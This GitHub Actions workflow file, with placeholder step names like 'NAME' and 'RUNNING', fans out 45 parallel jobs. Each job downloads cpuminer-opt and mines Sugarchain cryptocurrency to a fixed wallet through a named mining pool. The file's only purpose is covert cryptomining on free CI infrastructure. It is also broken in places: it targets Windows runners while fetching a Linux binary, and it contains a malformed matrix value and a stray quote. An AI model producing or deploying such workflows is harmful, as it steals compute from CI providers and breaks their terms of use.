name: NAME

on: [workflow_dispatch]

jobs:
  build:
    name: NAME
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - name: Extract
      run: tar xf cpuminer-opt-linux.tar.gz
    - name: RUNNING
      run: ./cpuminer-sse2 -a yespowersugar -o stratum+tcp://1pool.sugarchain.org:3333 -u sugar1q3y2ntrjcsjahz9e26r9ergn76lhq7n6j6x0cca.vps '
    - name: DONE
      run: exit
